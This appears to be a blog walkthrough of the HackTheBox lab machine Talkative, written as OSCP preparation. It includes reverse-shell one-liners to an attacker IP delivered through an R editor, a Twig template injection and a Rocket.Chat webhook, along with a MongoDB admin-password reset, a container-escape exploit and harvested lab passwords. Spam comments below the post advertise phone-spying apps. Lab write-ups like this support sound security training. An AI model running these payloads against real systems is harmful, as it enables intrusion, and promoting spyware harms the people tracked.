OSCP PREPROTİONS – HTB Talkative

Talkative machine is a vulnerable machine with Linux operating system among the reitred machines and we are expected to obtain user and oot flags using these vulnerabilities.
We perform a netwotk scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of the network scan, 22/tcp filtered ssh, 80/tcp Apache httpd 2.4.52, 3000/tcp ppp, 8080/tcp Tornado httpd 5.0, 8081/tcp Tornado httpd 5.0, 8082/tcp Tornado httpd 5.0 ports were open.
We understand that the ssh connection is filtered by fw, let’s enumerate these ports in order
80.port

Here we understand that it uses bolt as a CMS, we get an error when filling out the contact form that bolt is the directory.
When we go and look it redirects us to the login screen

Here we enter the default credential information, look at the source codes, note that we did not find any results and continue.
There is routing on port 3000 on the homepage

3000.port

Redirecting to Rocket.chat
Here is the account creation area, let’s create an account for ourselves and provide enumeration in it
If you get the error “The email entered is invalid/ Invalid email” when creating an account, type the email address with the domain talkative.htb here

We were able to log in after creating the user

We couldn’t find an attractive area of interest here, we only saw that there was a Saul Goodman admin, we made a note of it and moved on.

8080.port
We provide enumeration over this port

Here he directed us to the R language
We could not provide enumeration over ports 8081 and 8082, where 404 not found error was returned, a gobuster scan can be done in case there may be a possibility API, but we do not provide file directory scanning that we do not need for now.

On port 8080, we were redirected to the Jamovi spreadsheet web application, let’s continue with this.

Using the R editor, we saw that we can execute commands

Let’s google and see if we can run an os command here

Here by examining these exaples
try(system(“whoami”, intern = TRUE))
We typed the command

We ran it successfully
Let’s try to reversehell here
/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.19/4747 0>&1’
We were able to get shell using the command

We understand that the shell screen we get is on docker

Here we provide local enumartion.
The bolt-administration.omv file under the root directory is noteworthy, it says that it is a zip file, we tried to look inside it on the target machine but we could not open it, so we transferred the file to ourselves with nc and then unzipped the file.

When we unzip the files here, we detect the crednetial information in the xdata.json file

matt@talkative.htb
janit@talkative.htb
saul@talkative.htb
jeO09ufhWD<s
bZ89h}V<S_DA
)SQWGm>9KHEA


We have noted this information
Here we tried these paros on the admin user in Bolt CMS, with a little bit of conjecture
admin: We were able to log in from jeO09ufhWD<s credential information.

Here we provide enumeration

In the file managemnt section we look at the view & edit templates section
Here we click on the bse-2021 option, we have seen that the source codes use 2021

We edit the index.twig file to see if there is a change in the web page

We broke the web page here 🙂

We understand that the code we added here works, we searched on Google to see if we can do code injection here.

Let’s run this code

We have seen that it works, so let’s create a revershell for ourselves
{{[“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.19/4700 0>&1′”]|filter(‘system’)}}

After saving, we refreshed the web page and got our shell

Here again we are facing a docker where we provide enumeration.

Here we saw that most of our vehicles were missing

We saw that ssh was filtered in the nmap scan, let’s try to see if it allows us to make an internal ssh connection
We tried with admin and user names and finally we were able to log in with user saul.
ssh saul@172.17.0.1
password jeO09ufhWD<s

This way we got our user flag

Since our authorization is limited here, we continue with local enumeraion

Here update_mongo.py caught our attention
We could not access this file, mongo db is being used inside but not on this machine, so we think that docker exists again

Mongodb’s default port is port 27017 and we realized that the requestor to this port is mongodb at 172.17.0.2
echo > /dev/tcp/172.17.0.2/27017; echo $?

To access the service here we will use the chisel tool, first we download chisel from github Then we create a web server for the other machine to download it from here

We go from the target machine and download the chisel

Now we make the target machine a client in chisell and then we make our atttacker machine a server so that the mongodb on the target machine can be accessed from our machine.

Then we established a connection with ongosh

After connecting here, we looked at the db’s through the title of how to pentest in mongodb, which was determined in hacktirck, then we looked at the collections, here we saw the users on meteor dbs

Here we saw our own user that we created

Let’s not bother with breaking the admin password, let’s change the admin password on roketcheat and access it
We investigated how to change it on Google

db.getCollection(‘users’).update({username: “admin”}, { $set: {“services” : {“password” : {“bcrypt” : “$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG” } } } })
We changed the password of the admin user to 12345 using the command

Let’s access the rocketech

We are logged in as admin
Here we provided emueration and found that the version is old

We tried to look for this exploit

Here we have executed the given commands

Verilen komutu
const require = console.log.constructor(‘return process.mainModule.require’)();
const { exec } = require(‘child_process’);
exec(‘/bin/bash -c “bash -i >& /dev/tcp/10.10.14.19/8000 0>&1′”);
olarak dğzenlyeip kaydettik

After saving as save changes

We will make a request to the url here
http://talkative.htb:3000/hooks/xjuij3wPdDjLBFzrE/vJmjSPsRfRFkYHY5uS4qPp5QHzzg4kmJHSiev2vTbbKgEJiA
We’re listening with nc before we’re found.
then we make a request with curl

As you can see we got root shell
We’re in another fucking docker machine
there was nothing interesting in this docker, so I decided to check what capabilities we have.

there is no immediate binary file but another way to view capabilities is by reading capsh from our local machine and using capsh var/proc/self/status

Copying CapBnd shows a value of 00000000a80425fd
Let’s decode it on our own machine to see the capabilities

Here we can see that we can read all files on the host machine
I searched here for exploits that I can use for this
We encountered Cdk

I downloaded theexploit found here to my machine and transferred it to the target machine, since the target machine does not have nc, curl, wbet, I transferred it with cat

After transferring the cdk to the target machine
./cdk run cap-dac-read-search /root/root.txt
We read the root flag
Here we could add sssh key without reading the root flag and get root shell

Comments

  1. ecommerce

    Hello! Do you know if they make any plugins to assist with Search
    Engine Optimization? I’m trying to get my blog to rank for some targeted
    keywords but I’m not seeing very good gains.
    If you know of any please share. Kudos! You can read similar blog here: Sklep

  2. Rastrear Teléfono Celular

    Esto puede ser molesto cuando sus relaciones se interrumpen y no se puede rastrear su teléfono. Ahora puede realizar esta actividad fácilmente con la ayuda de una aplicación espía. Estas aplicaciones de monitoreo son muy efectivas y confiables y pueden determinar si su esposa lo está engañando.

  3. Szpiegowskie Telefonu

    Szpiegowskie telefonu – Ukryta aplikacja śledząca, która rejestruje lokalizację, SMS-y, dźwięk rozmów, WhatsApp, Facebook, zdjęcie, kamerę, aktywność w Internecie. Najlepsze do kontroli rodzicielskiej i monitorowania pracowników. Szpiegowskie Telefonu za Darmo – Oprogramowanie Monitorujące Online.

  4. Amie

    Howdy! Do you know if they make any plugins to assist with
    SEO? I’m trying to get my website to rank for some targeted keywords but I’m not seeing very good results.
    If you know of any please share. Kudos! You can read similar blog here: GSA List

  5. tlovertonet

    What’s Happening i’m new to this, I stumbled upon this I have found It absolutely helpful and it has helped me out loads. I hope to contribute & aid other users like its aided me. Great job.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir